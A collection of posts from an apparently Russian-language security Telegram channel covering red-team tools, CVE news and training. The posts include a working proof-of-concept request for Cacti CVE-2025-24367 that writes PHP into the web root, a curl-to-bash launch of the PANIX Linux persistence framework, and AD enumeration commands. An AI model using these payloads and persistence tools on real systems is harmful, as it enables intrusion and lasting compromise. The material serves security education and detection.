Whitehat Lab
1.88K subscribers
335 photos
384 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🔄 🏃 adPEAS 0.8.25

Отличный инструмент для проведения enumeration в 🏠 Active Directory

UPD. Добавили поддержку Windows 2025

Представлен в 2х вариантах, стандарт и лайт

Полная версия имеет встроенный модуль SharpHound для сбора информации в 😉 Bloodhound

Стандартный запуск:

Import-Module .\adPEAS.ps1
Invoke-adPEAS


Доступные модули:

Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках

Rights - поиск различных прав, например LAPS, DCSync и т.д.

GPO - базовая информация о групповых политиках

ADCS - информация о центрах сертификации

Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.

Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей

Accounts - информация об аккаунтах

Computer - AD DS, AD CS, Exchange серверы и т.д.

BloodHound - сборщик данных для BH


Варианты запуска:

Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor

Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'


Определенная УЗ:

$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)

Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred


Модули:

Invoke-adPEAS -Module Domain

Invoke-adPEAS -Module Rights

Invoke-adPEAS -Module GPO

Invoke-adPEAS -Module ADCS

Invoke-adPEAS -Module Creds

Invoke-adPEAS -Module Delegation

Invoke-adPEAS -Module Accounts

Invoke-adPEAS -Module Computer

Invoke-adPEAS -Module Bloodhound -Scope All


💻 Home

#soft #powershell #activedirectory #enumeration

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ Cacti CVE-2025-24367
Arbitrary File Creation leading to RCE


Позволяет аутентифицированному пользователю злоупотребить функциями создания графов и шаблонов графов для записи произвольных PHP-скриптов в корень сайта

PoC:
POST http://192.168.178.78/cacti/graph_templates.php?header=false HTTP/1.1
host: 192.168.178.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 804
Origin: http://192.168.178.78
Connection: keep-alive
Referer: http://192.168.178.78/cacti/graph_templates.php?action=template_edit&id=297&csrf_timeout=true&csrf_timeout=true
Cookie: CactiDateTime=Fri Jan 03 2025 14:03:51 GMT+0000 (Greenwich Mean Time); CactiTimeZone=0; Cacti=r378gdiav394djct96o26mliud; cacti_remembers=1%2C0%2C1ac46cea6e1f0225f6e52320b4d734503fac5215a76879b3cb2c939d5cc56c49
Priority: u=0

__csrf_magic=sid%3A3363ef9d47d62372302b4941b790e92f5f749d9c%2C1735913031&name=PING+-+Advanced+Ping&graph_template_id=297&graph_template_graph_id=297&save_component_template=1&title=%7Chost_description%7C+-+Advanced+Ping&vertical_label=milliseconds&image_format_id=3&height=200&width=700&base_value=1000&slope_mode=on&auto_scale_opts=1&upper_limit=10&lower_limit=0&unit_value=&unit_exponent_value=1&unit_length=&right_axis=&right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A&right_axis_format=0&right_axis_formatter=0&left_axis_formatter=0&tab_width=30&legend_position=0&legend_direction=0&rrdtool_version=1.7.2&action=save


🖥 Summary

#web #rce #cacti #cve

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️Онлайн инструменты для работы с JWT

JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.

Состоит из трёх частей: заголовок, пейлоад и подпись

➡️Мой любимый - https://token.dev
➡️По классике - https://jwt.io
➡️Еще неплохой вариант
➡️Отдельно декодер для Flask Session Cookie

Пример простейшей реализации на Python 🐍

import json
import hmac
import hashlib
import base64
import uuid

header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())


def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))

merge_payload_header = b'.'.join(jwt_parts)

signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
jwt_parts.append(base64.urlsafe_b64encode(signature))

return b'.'.join(jwt_parts)

print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))


#jwt #token #flask #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Adalanche v2025.2.6

Обновление отличного кроссплатформенного инструмента для визуализации, построения графов, связей и исследования Active Directory.
Даст мгновенные результаты, показывая, какие разрешения имеют пользователи и группы в 💻 AD. Полезен для изучения того, кто может управлять учетными записями, машинами или всем доменом, и может использоваться для поиска и отображения неправильных конфигураций. Покажет проблемы делегирования, AD CS и многое другое.
Проект активно развивается. Написан на 💻

Отличия от 😉 BloodHound:

Не требуется Neo4J, Python
Не требуется предварительной настройки
Для построения запросов используется расширенный LDAP синтаксис
Наличие бесплатной и коммерческой версии


Машина в домене:

adalanche.exe collect activedirectory


Машина не в домене:

adalanche.exe collect activedirectory --ignorecert --domain contoso.local --authdomain CONTOSO --username dom_user --password P@ssw0rd


Будет создана папка data

Анализ:

adalanche.exe analyze


💻 Github
💻 Documentation
➡️ Commercial version

#adalanche #golang #soft #activedirectory

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1
✏️ 🔄 ImHex v1.37.4

Обновление открытого шестнадцатеричного редактора для работы в 💻 🐧💻
ImHex содержит всевозможные инструменты и функции, такие как средство просмотра энтропии и встроенный интерфейс для дизассемблера Capstone
Имеет пользовательский язык шаблонов, используемый для определения структур и типов данных, который обеспечивает автоматический анализ файлов и аннотацию
Написан на 💻 Распространяется по лицензии GPL-2.0

💻 Github
💻 Download
➡️ Home
➡️ Web version
➡️ Docs

#imhex #soft #cplusplus

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔓 Lastpass

В далеком 2014 году зарегистрировал аккаунт в данном сервисе, сколько там сохранено записей трудно даже представить, а теперь и не узнать вовсе.

Вчера вечером не получилось войти с валидными кредами и я попробовал зарегистрировать новый аккаунт на свой же 📧email адрес и о чудо, поздравили с успешной регистрацией и предложили добавить свой первый пароль 😭

Знаю, что их несколько раз удачно "пентестили" 😂 И предпосылки сменить данный сервис имелись, но как всегда было лень и не доходили руки, теперь дошли.

Сказать что я чуть [цензура], ничего не сказать, доверие к подобным сервисам упало до нуля и было принято волевое решение использовать - 🔓 KeePassXC и держать все свои данные в локальной базе.

Благо с памятью у меня все в порядке и почти все необходимое помню наизусть, что не вспомню, буду восстанавливать.

Ну а вы друзья, товарищи, чем подобным пользуетесь ?

#keepassxc #passwords

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️SploitScan v0.13.0

Нашел отличный и удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой 👩‍💻 AI (ChatGPT, Gemini, Grok и DeepSeek) и функцией импорта из популярных 😁 сканеров

Установка в 🐧 Debian like:

sudo apt install sploitscan


В репозиториях не самая новая версия, поэтому рекомендую ставить с гитхаба.

😹 Github:

git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt


PyPi:

pip install --user sploitscan


Источники PoC'ов:

➡️GitHub
➡️ExploitDB
➡️VulnCheck (нужен free API key)
➡️Packet Storm
➡️Nuclei


Импорт из:

Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)


В конфиге указываем API ключи поддерживаемых сервисов (config.json)

{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}


Поиск по CVE:

sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413


Поиск по ключевым словам:

sploitscan -k "Outlook Express"


Импорт и экспорт:

sploitscan --import-file path/to/yourfile.nessus --type nessus

sploitscan CVE-2024-1709 -e {json,csv,html}


Помощь AI:

sploitscan --ai openai CVE-2024-21413

┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...


#sploitscan #poc #cve #python

💻 Github

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Базовый софт

🤩 Пару лет назад уже делал подобный пост, но с той поры многое изменилось, решил обновить список используемого мной софта на повседневной основе.
Конечно, тут далеко не всё, с чем приходится иметь дело, но базовые утилиты и инструменты я постарался указать. Пишите в комментарии свои любимые инструменты и сервисы.

📌OS's:

💻 Manjaro ▪️ 🐧 Kali ▪️ 💻 Windows 11

📌Core:

➡️GNU core utilities
➡️Python + Pycharm
➡️Vivaldi | Firefox
➡️Virtual Box | Vmware Workstation
➡️OpenSSH

📌Base:

➡️Xfce + Qterminal
➡️Zsh + Oh my zsh
➡️Windows terminal + Oh my posh
➡️Total commander
➡️Midnight commander
➡️Sublime text
➡️Telegram
➡️Wireguard
➡️KeePassXC
➡️LDPlayer
➡️Obsidian
➡️Bandicam
➡️qBittorrent
➡️ShareX
➡️Clipdiary
➡️Sysinternals

📌 Tools:

➡️Sqlmap
➡️Ffuf
➡️Nmap | RustScan
➡️Pwncat-cs
➡️Burp suite
➡️Dbeaver
➡️Autopsy
➡️Hex editor neo
➡️SploitScan

📌Online services

➡️Perplexity
➡️Blackbox
➡️Sploitus
➡️WADComs
➡️CyberChef

#soft #kit #tools

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🛡️ PANIX - Persistence Against *NIX v2.1.0

Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, предназначенный для пентестеров, инженеров по обнаружению, CTF энтузиастов и других. Уделено особое внимание функциональности, что делает его важным инструментом для понимания и реализации широкого спектра методов закрепления.

Запуск:

curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash


😹 Home

#soft #shell #linux #pentest

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Cyberdefense Active Directory Mindmap v2025.03

Невероятно подробная шпаргалка по пентесту AD инфраструктуры. Лучше не встречал. Рекомендую!

АХТУНГ! Огромное разрешение 19148x7303

➡️ SVG
➡️ PNG

😹 Home

#activedirectory #pentest #cheatsheet #redteam #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️CVE-2025-29927 - Next.js and the corrupt middleware

Очередная уязвимость в популярном JS фреймворке

Next.js использует хедер x-middleware-subrequest, для предотвращения рекурсивных запросов

Уязвимость позволяет обойти проверки авторизации, выполняемые в промежуточном программном обеспечении Next.js, что потенциально позволяет злоумышленникам получить доступ к конфиденциальным данным

Недостаток устранен в версиях 12.3.5, 13.5.9, 14.2.25 и 15.2.3

Подробный разбор (на англ.)

➡️Summary

🔄 Nuclei шаблон:

id: nextjs-CVE-2025-29927

info:
name: Next.js - CVE-2025-29927
author: 6mile
severity: critical
description: |
Next.js has a critical vulnerability that allows attackers to bypass authentication entirely when the application utilizes middleware for authorization.
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://zeropath.com/blog/nextjs-middleware-cve-2025-29927-auth-bypass
metadata:
verified: true
vendor: vercel
product: next.js
framework: node.js
shodan-query:
- http.html:"/_next/static"
- x-powered-by: next.js
- x-nextjs-cache:
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
tags: nextjs,cve-2025-29927

http:
- method: GET
path:
- "{{BaseURL}}"

matchers-condition: and
matchers:
- type: word
name: Next.js
part: header
words:
- 'x-nextjs-cache:'
- 'x-powered-by: next.js'
- 'x-nextjs-prerender:'
- 'x-nextjs-stale-time:'
- 'set-cookie: NEXT_LOCALE='
condition: or
case-insensitive: true

- type: word
name: Next.js Middleware
part: header
words:
- 'x-middleware-rewrite:'
- 'x-middleware-set-cookie:'
condition: or
case-insensitive: true

- type: status
status:
- 200


#web #pentest #nextjs #cve

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX

Wiz Research
обнаружила CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 и CVE-2025-1974, серию RCE в контроллере Ingress NGINX для Kubernetes, получившем название IngressNightmare. Использование этих уязвимостей приводит к несанкционированному доступу злоумышленников к чувствительным данным, хранящимся во всех namespace'ах кластера Kubernetes, что может привести к его захвату.

Nuclei шаблон для проверки:

id: exposed-ingress-nginx-admission

info:
name: Publicly exposed Ingress NGINX Admission
author: Wiz research
severity: high
description: Ingress Nginx admission controller endpoint should not be exposed
metadata:
max-request: 1
tags: ssl,tls

ssl:
- address: "{{Host}}:{{Port}}"

matchers:
- type: dsl
dsl:
- 'contains(issuer_org, "nil1")'
- 'contains(subject_org, "nil2")'
- 'contains(subject_an, "nginx")'
condition: and

extractors:
- type: json
name: issuer_org
json:
- ".issuer_org[0]"

- type: json
name: subject_org
json:
- ".subject_org[0]"

- type: json
name: subject_an
json:
- ".subject_an[0]"


Подробнее (на англ.)

➡️ Research

#nginx #ingress #cve #kubernetes

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ ArgFuscator

Веб-приложение с открытым исходным кодом, которое помогает генерировать обфусцированные команды для 💻 Windows, 🐧 Linux и 💻 MacOS

➡️ https://argfuscator.net
😹 Offline version

#windows #obfuscator #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ iximiuz Labs

Практические задания, направленные на развитие ваших навыков в области 🖥 DevOps и/или серверной разработки. Одни задачи имеют более образовательный характер, другие же базируются на реальных сценариях. Платформа предлагает подсказки и обратную связь для каждого задания, включая автоматизированную проверку решений.

В разделе с контейнерами 75 задач и 43 для кубика.
Задания рассчитаны как на новичков, так и на опытных специалистов.
Похоже на Сodewars, но для DevOps

Примеры некоторых заданий:

▪️Run a Container in Background, Read Logs, and Attach
▪️Install and Configure containerd on a Linux Host
▪️Build a Production-Ready Node.js Container Image: Nuxt Application
▪️Classic Sysadmin Task: Which Process Is Listening on a Port?
▪️Make a Kubernetes Pod Survive an OOM Event Without Restarting


➡️ https://labs.iximiuz.com/challenges

#devops #training #docker #kubernetes

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🎃 Awesome Hacker Search Engines

Большая подборка поисковиков, которые будут полезны ИТ специалистам, поиск по различным устройствам, эксплоитам, уязвимостям, исходным кодам и т.д.

➡️ https://awesome-hacker-search-engines.com

Постоянно пользуюсь сам:

▪️ Shodan
▪️ security.snyk.io
▪️ Exploit-DB
▪️ Sploitus
▪️ GTFOBins
▪️ LOLBAS
▪️ grep.app
▪️ DNSDumpster
▪️ Crt.sh
▪️ Have I Been Pwned
▪️ ntlm.pw

#search #security #servers #exploit

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
✔️ Kerberos, again

Серия публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.

🔗 Kerberos I - Overview
🔗 Kerberos II - Credential Access

Software:

😹 Kerbrute
😹 hashcat
😹 impacket
😹 Rubeus
😹 mimikatz
😹 keytab.py
😹 gettgtpkinit.py
🦈 Wireshark

#kerberos #windows #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
✔️ Kerberos, again

Серия публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.

🔗 Kerberos III - User Impersonation

🔗 1 и 2 части

Software:

😹 Kerbrute
😹 hashcat
😹 impacket
😹 Rubeus
😹 mimikatz
😹 keytab.py
😹 gettgtpkinit.py
🦈 Wireshark

#kerberos #windows #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
✔️ Kerberos, again

Заключительная, 4 часть из серии публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.

🔗 Kerberos IV - Delegations

🔗 1 и 2 части
🔗 3 часть

Software:

😹 Kerbrute
😹 hashcat
😹 impacket
😹 Rubeus
😹 mimikatz
😹 keytab.py
😹 gettgtpkinit.py
🦈 Wireshark

#kerberos #windows #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
🔵 Всем доброго времени суток!

Недавно закончил обучение на курсе 🏠 Анализ защищенности инфраструктуры на основе технологий Active Directory от Академии 😎 Codeby и все никак не доходили руки написать небольшой отзыв.

Далее мое сугубо индивидуальное мнение

На формирование итогового мнения о курсе влияет большое количество факторов:

▪️ количество времени, которое вы готовы уделять курсу
▪️ уровень ваших знаний по теме курса в момент его старта
▪️ уровень ваших знаний по смежным темам и т.д.

Причины выбора курса:

1. Авторский/кураторский состав

Думаю, что решающим фактором записаться на курс в первом потоке конкретно для меня была строка в одном из рекламных сообщений: "Первые два потока кураторами курса являются его авторы"

🎃 Михаил "RalfHacker". Я думаю, что в комьюнити ИБ в России о Ralf’e знают все. Безусловно, одна из причин такой популярности - книга за его авторством по тестированию AD. Данную книгу к прочтению рекомендуют как специалисты BlueTeam, так и RedTeam. Он также автор одного из самых крупных авторских ТГ каналов по ИБ в 🇷🇺 России. Постоянный участник 😎 Standoff и неоднократный победитель данного мероприятия.

🎃 Павел "BlackRabbit" - так же многократный победитель Standoff. Он чаще других дает интервью, интересно рассказывает и его приятно слушать. Впервые я увидел его во время интервью на одном из Standoff.
Там он и рассказал, что является Red и Purple тимлидом. В интервью, которое он давал перед стартом курса, он подтверждает это. Канал Павла

2. Отсутствие аналогов в 🇷🇺 РФ

Этот тезис был одним из рекламных слоганов. Я думаю, что каждый, кто обучается или обучался на курсах по ИБ примерно представляет себе, как выглядит рынок этих курсов в России. И думаю многие понимают, что это правда.
В русскоязычном сегменте, из известных мне курсов по внутрянке, есть лишь ещё курс по тестированию инфраструктуры от CyberEd. Но он не сосредоточен только на AD. Он также затрагивает темы тестирования инфраструктуры в Linux. Так что данный курс действительно уникальный в данном сегменте.

Курс затрагивает очень большое количество тем.
Начинается с базовых теоретических понятий: объект, лес, домен и т.д.
Далее идет блок, связанный с пентестом 🪟 Windows - способы получения первичных данных, способы повышения привилегий, получение учетных данных на скомпрометированных машинах через DPAPI, хранилищах SAM, LSASS и др., способы сохранения доступа в скомпрометированных системах.
Блок про туннелирование 😉 (pivot) трафика, где есть возможность поработать с chisel, ligolo
А потом начинается AD - kerberos, делегирование, уязвимые ACL, ретрансляционные атаки, тестирование 🖥 MSSQL в контексте AD, атаки на центры сертификации ADCS, доверительные отношения между доменами.

Не смотря на то, что в большинстве своем методички составлены прекрасно, главное преимущество курса, это конечно же, практические лабораторные к каждому уроку. 16 больших стендов для отработки всего изученного материала и экзаменационный стенд.

Количество хостов в домене по мере движения по курсу растет. Количество техник и методик, которые нужно применять, чтобы скомпрометировать машинку также увеличивается.

В лабах работают боты на почтовых сервисах, которые по разному отвечают в зависимости от контекста. Скрипты, которые запускают службы, позволяя реализовать DLL-hijacking. Все лабы логически и последовательно выстроены.

Большой и сложный экзамен, на решение которого дается 24 часа является отличной проверкой ваших знаний. Только вы, задания и лабораторный стенд.

Огромное спасибо Паше и Мише за разработку отличного курса.
Я почти уверен, что любой, кто самостоятельно сможет пройти данный курс от начала и до конца вполне может претендовать на должность пентестера.

P.S. Для будущих поколений, ребят, курс сложный, рассчитывайте свои навыки, база должна быть приличной. И да прибудет с вами сила!

#active_directory #windows #course #pentest

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM